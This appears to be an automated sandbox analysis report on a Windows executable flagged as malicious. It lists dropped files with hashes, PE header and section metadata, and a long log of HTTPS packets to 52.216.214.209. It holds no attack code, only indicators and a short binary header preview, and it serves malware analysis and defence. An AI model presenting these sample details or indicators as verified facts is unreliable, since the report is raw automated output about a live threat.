                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\UBONg7lmVR.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):8077824
                                                Entropy (8bit):6.958055025032026
                                                Encrypted:false
                                                SSDEEP:98304:ha48jDV5s44tAbCEAVomRGM6oCRXpqALGFFV/lz8RY5ui2R:haV5s4ZPAunVRZXGxlz8cuF
                                                MD5:A499C507987982C951093E21DF0C0D96
                                                SHA1:FA1A7050198570E016FC4BF3DDD69160E05A8A38
                                                SHA-256:64AAFFE3B4D705B9DDBCE60E8FD8B9829C20438B8C68AE254E185C0F466E0265
                                                SHA-512:0AB3D225FC8901D9CC1719EE61E0CDB444532F8A43B307382E7F3E5D610BCF1D54B5ABEF23649C370E5E960366270D99D94629E47868AE7959522A54D574A27D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 11%
                                                • Antivirus: Virustotal, Detection: 8%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........u......."......~&...................@...........................................`... .............................................. ~.T.............Z.X............0~.......................................................N..............................text...5|&......~&................. ..`.rdata...h'...&..j'...&.............@..@.data.........N.......M.............@....pdata..X.....Z.......Q.............@..@.xdata........[.......R.............@..@/4......).....[.......R.............@..B/19....._.....[.......R.............@..B/32......l....b..n...tY.............@..B/46.....0.....d.......Z.............@..B/65......... d.......Z.............@..B/78.....:.....r.......i.............@..B/90...........{......6r.............@..B.idata..T.... ~.......t.............@....reloc.......0~.......t.............@..B.symtab.......~.......u................B........
                                                Process:C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):19
                                                Entropy (8bit):3.366091329119193
                                                Encrypted:false
                                                SSDEEP:3:hMCE/N:hul
                                                MD5:F92A9EF0567DB794EFBE6CC7D98974CC
                                                SHA1:51728A8A25C4F2805984F294DADCE85E738B90D9
                                                SHA-256:26D96E97CEE88C873CFA14F364E79DAE57265CF8DA97ED1EA65A66A5EC6AD673
                                                SHA-512:14C3C14D4E4D93619C0982BB22BD73930531F510C281BE2E8B1EC6C92F1E1CDCE11AC90F13D8F1F6EE79AAA88711B54AD119A16EE51582A2C6ED4071A5C9684A
                                                Malicious:false
                                                Preview:This is a new file.
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):0.025120815978877453
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:UBONg7lmVR.exe
                                                File size:52'506'624 bytes
                                                MD5:d2db9a159617250a517f9d074ab8f947
                                                SHA1:cdc8efcd77ce4725200f29b9be43dac308a139a1
                                                SHA256:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e
                                                SHA512:f1fba436f68603ce07314292bb63af326ddf4748d0b622b1da5d76c8880ae7c11c80301b339a847c41adb6d83eb95fb7f60b19385f2dcbd4c611d29017998376
                                                SSDEEP:1536:4no014QhBgKrsMGr5G+slCbUuz2KLj3tC7wjsX/jVh5X6XL5X7r0eHoz:4o014QhBgdACFleksXD5K7ln0hz
                                                TLSH:03B72B24D518FD3ADD1282344439E2EE262E1E40A671CC3EBD587E2E5DB33D43761EA6
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~4..........."...0...!.........n0!.. ...@!...@.. ........................!...........`................................
                                                Icon Hash:2d2e3797b72b0b99
                                                Entrypoint:0x361306e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xBB347EF2 [Thu Jul 11 14:49:22 2069 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3213020 | 0x4b | .text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3214000 | 0x19ea | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3216000 | 0xc | .reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x2000 | 0x3211074 | 0x3211200 | 5a666a826e8dc7814dac7f8ff900a201 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x3214000 | 0x19ea | 0x1a00 | 69965859e0a13ab7b1284d0e357f31f9 | False | 0.3487079326923077 | data | 4.665608381406232 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc | 0x3216000 | 0xc | 0x200 | e92f29fd0f22a9375098f27ff47f755d | False | 0.044921875 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "!\003\014" | 0.11836963125913882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                RT_ICON | 0x32141c0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | | | 0.5675675675675675
                                                RT_ICON | 0x32142e8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | | | 0.476878612716763
                                                RT_ICON | 0x3214850 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | | | 0.46774193548387094
                                                RT_ICON | 0x3214b38 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | | | 0.40794223826714804
                                                RT_GROUP_ICON | 0x32153e0 | 0x3e | data | | | 0.8387096774193549
                                                RT_VERSION | 0x3215420 | 0x3e0 | data | | | 0.35786290322580644
                                                RT_MANIFEST | 0x3215800 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                DLL | Import
                                                mscoree.dll | _CorExeMain
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Aug 27, 2024 12:55:14.805852890 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.805886030 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.805892944 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.805921078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.806395054 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.806406975 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.806444883 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.806452036 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.806462049 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.807506084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.807518959 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.807571888 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.807580948 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.849486113 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.890750885 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.890782118 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.890841007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.890889883 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.890898943 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.890944004 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891113043 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891130924 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891165972 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891171932 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891200066 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891799927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891834021 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891860008 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891870975 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891879082 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891906023 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891930103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.892307043 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.892323017 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.892364025 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.892369032 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.892374992 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.892399073 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.892416954 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893033028 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893045902 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893091917 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893099070 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893105030 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893141031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893148899 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893155098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893179893 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893196106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893202066 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893234968 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893245935 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893801928 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893855095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893867016 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893919945 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893927097 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893955946 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.943101883 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.977989912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978025913 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978060007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978163958 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.978174925 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978293896 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.978384018 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978398085 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978429079 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978498936 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.978511095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978589058 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.978971958 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978986025 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979028940 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979029894 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.979039907 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979057074 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.979084969 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.979526043 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979540110 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979598045 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.979610920 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980243921 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980269909 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980298996 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.980305910 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980330944 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.980349064 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980375051 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980403900 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.980411053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980436087 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981261969 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981290102 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981321096 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981328964 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981355906 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981514931 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981538057 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981573105 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981580973 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981604099 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981628895 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.070025921 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070043087 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070071936 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070188046 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.070202112 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070513010 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070535898 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070616961 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.070627928 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071074963 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071086884 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071127892 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071136951 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071160078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071762085 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071779013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071825027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071835041 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071851969 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071872950 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071886063 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071918011 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071923971 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071949959 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.072797060 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072813034 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072858095 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.072866917 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072904110 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072920084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072954893 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.072962046 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072974920 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.115082026 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.115098953 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.152766943 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.152786970 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.152827978 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.152843952 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.152861118 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.153482914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.153496981 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.153549910 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.153557062 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.153956890 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.153970003 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.154016972 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.154026031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.154040098 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155205965 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155235052 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155268908 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155277014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155309916 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155332088 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155723095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155736923 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155786991 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155791998 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155798912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155837059 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.156383038 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156398058 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156438112 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156455040 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.156462908 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156507015 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.156572104 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156586885 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156626940 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156630993 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.156640053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156661987 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.157388926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.157406092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.157444954 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.157452106 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.157481909 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.208901882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.240659952 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.240684032 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.240722895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.240746975 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.240762949 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.240777969 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241079092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241100073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241127014 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241136074 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241164923 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241645098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241674900 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241697073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241708994 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241714954 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241744041 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241769075 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.242305040 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242325068 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242377996 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242383957 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.242389917 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242423058 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.242835045 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242854118 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242889881 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242911100 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.242918015 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243326902 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.243423939 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243438005 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243472099 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243475914 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.243484020 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243501902 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.243520975 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.244055033 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.244075060 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.244110107 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.244137049 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.244144917 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.244188070 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.327896118 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.327914000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.327958107 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328025103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.328042030 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328119040 CEST49707443192.168.2.552.216.214.209
